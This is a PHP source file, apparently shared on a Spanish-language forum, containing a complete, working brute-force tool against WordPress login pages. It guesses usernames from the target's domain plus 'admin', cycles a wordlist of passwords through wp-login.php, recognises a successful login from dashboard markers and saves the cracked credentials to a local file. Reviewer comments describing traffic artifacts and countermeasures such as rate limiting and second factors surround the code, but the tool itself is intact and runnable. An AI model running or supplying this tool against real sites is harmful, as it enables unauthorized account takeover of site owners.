- Código:
<?php
/*
* Simple Wp BruteForce using usergen
*
* Current users to test (http://sitexample.com)
* -> admin
* -> siteexample
* -> siteexam (substr 8)
*
* php wpBrute.php http://uri wordlist
*
* By n4sss
* Contact: n-l4b[at]hotmail[dot]com
* http://janissaries.org
*
**/
// Remove PHP's execution time limit so the run is not cut short by max_execution_time.
set_time_limit(0);
// Disable all PHP error reporting: warnings and notices from the code below are not shown.
error_reporting(0);
/**
 * Password-guessing client for a WordPress login form (wp-login.php).
 *
 * Candidate usernames are 'admin' plus two names derived from the first label of the
 * target host name (see usergen()). Candidate passwords are the lines of the wordlist
 * file plus those same two derived names. Every username/password pair is sent as one
 * POST to http://<uri>/wp-login.php, sequentially, with no delay between requests.
 *
 * Observable artifacts, taken from the code below:
 *  - server side: a series of POSTs to /wp-login.php whose body has the form
 *    log=<user>&pwd=<password>&wp-submit=Log In&redirect_to=http://<uri>/wp-admin/&testcookie=1
 *    (the body is passed to cURL as a plain string, so the space in "Log In" is not encoded);
 *  - client side: 'ok_wp.txt' (hit log) and '<first host label>.cookie' (cookie jar,
 *    deleted by the destructor) in the working directory.
 *
 * NOTE(review): no CURLOPT_USERAGENT is set, so the requests presumably carry no
 * User-Agent header - confirm against captured traffic before relying on it for detection.
 * NOTE(review): the usual controls against this request pattern are login rate limiting
 * or lockout, a second authentication factor, and account names that cannot be derived
 * from the site's domain.
 */
Class WpBrute{
// Raw output of the most recent curl_exec() call (headers and body).
var $httpResponse = null;
// Name of the file that receives the line written on a match ('ok_wp.txt').
var $log = null;
// Timeout in seconds, used for both the connect and the total transfer timeout.
var $timeout = null;
// Path of the cURL cookie jar file; set in usergen().
var $cookieContainer = null;
// Target as given on the command line; usergen() strips "http://" and "www." from it.
var $uri = null;
// Login URL built in post(): 'http://' . $uri . '/wp-login.php'.
var $fullPath = null;
// Wordlist file path at construction time; replaced in start() by the array of candidates.
var $wordlist = null;
// Candidate usernames; set in usergen().
var $users = null;
/**
 * Stores the target and wordlist path, fixes the log name and timeout, and starts the run.
 *
 * Construction has side effects: start() is called from here, so creating the object
 * reads the wordlist and begins sending requests.
 *
 * @param string $uri      Target URI as passed on the command line.
 * @param string $wordlist Path of the wordlist file.
 */
function __construct($uri, $wordlist){
$this->uri = $uri;
$this->log = 'ok_wp.txt';
$this->wordlist = $wordlist;
$this->timeout = 8;
$this->start();
}
/**
 * Deletes the cookie jar file if it exists and prints "Finished".
 */
function __destruct(){
if(file_exists($this->cookieContainer)){
unlink($this->cookieContainer);
}
printf("\nFinished\n");
}
/**
 * Appends $content followed by CRLF to $file.
 *
 * Not called by any method shown in this class; post() writes its log line with
 * file_put_contents() instead.
 *
 * @param string $file    Path of the file to append to.
 * @param string $content Text to append.
 */
function save_content($file, $content){
$fp = fopen($file, "a+");
fwrite($fp, $content."\r\n");
fclose($fp);
}
/**
 * Derives the username list, two extra password candidates and the cookie jar name
 * from the target host name.
 *
 * For a target such as http://sitexample.com this yields the first host label
 * ("sitexample") and its first 8 characters ("sitexamp").
 */
function usergen(){
// The pattern is unanchored and its '.' is unescaped: it matches "http", or "www" followed by any character.
// On a match the literal substrings "http://" and "www." are removed from the URI.
if(preg_match("/http|www./", $this->uri)) $this->uri = str_replace(array("http://", "www."), "", $this->uri);
$toParse = $this->uri;
// Keep only the part before the first '/', i.e. drop any path.
if(strstr($toParse, '/')) $toParse = substr($toParse, 0, strpos($toParse, '/'));
// $pass[0] is the first dot-separated label of what remains; $upass is its first 8 characters.
$pass = explode(".", $toParse);
$upass = substr($pass[0], 0, 8);
// The cookie jar is a relative path, so it is created in the current working directory.
$this->cookieContainer = $pass[0].".cookie";
// Both derived names are also appended to the password candidates.
$this->wordlist[] = $pass[0];
$this->wordlist[] = $upass;
$this->users = array('admin', $pass[0], $upass);
}
/**
 * Sends one login POST per (username, password) pair and stops at the first response
 * that looks like an authenticated dashboard.
 *
 * Users are the outer loop and passwords the inner loop, so all passwords are tried
 * for one username before the next username starts. Each attempt is printed to stdout.
 */
function post(){
$this->fullPath = 'http://'.$this->uri.'/wp-login.php';
$msg = '';
foreach($this->users as $user){
foreach($this->wordlist as $password){
// Form body is built by string interpolation; values are inserted as-is.
$postContent = "log={$user}&pwd={$password}&wp-submit=Log In&redirect_to=http://{$this->uri}/wp-admin/&testcookie=1";
// A new cURL handle is created for every attempt.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $this->fullPath);
// Follow redirects, so the final response after a login redirect is what gets inspected.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
// Return the response as a string instead of printing it.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// The same file is used to store and to send cookies.
curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookieContainer);
curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookieContainer);
curl_setopt($ch, CURLOPT_TIMEOUT, $this->timeout);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->timeout);
// Include response headers in the returned string.
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postContent);
$this->httpResponse = curl_exec($ch);
// An attempt counts as a match when the returned headers+body contain "adminmenuback" or "Comments".
if(preg_match("/adminmenuback|Comments/", $this->httpResponse)){
$msg = sprintf("[+][OK] %s %s:%s\n", $this->fullPath, $user, $password);
print $msg;
// Append the matching URL and credential pair to the log file; '@' suppresses any write error.
@file_put_contents($this->log, $msg, FILE_APPEND);
// Terminate the whole script on the first match.
exit(0);
}else{
$msg = sprintf("[-] %s:%s\n", $user, $password);
print $msg;
}
}
}
}
/**
 * Prints the banner, waits 5 seconds, loads the wordlist, then runs usergen() and post().
 */
function start(){
// At this point $this->wordlist is still the file path passed to the constructor.
printf("wp brute by n4sss\n\n[Uri] %s\n[Wordlist] %s\n\nWait the brute!\n", $this->uri, $this->wordlist);
sleep(5);
// Read the whole file, split on "\n", and drop entries that array_filter() treats as empty.
$this->wordlist = array_filter(explode("\n", file_get_contents($this->wordlist)));
$this->usergen();
$this->post();
}
}
// CLI entry point: needs two arguments, the target URI and the wordlist path.
// Both are trimmed; constructing WpBrute starts the run, because its constructor calls start().
if(isset($argv[1],$argv[2])){
$wpBrute = new WpBrute(trim($argv[1]), trim($argv[2]));
}else{
// Without both arguments, print the usage line and exit with status 0.
printf("php %s http://uri wordlist\n", $argv[0]);
exit(0);
}
?>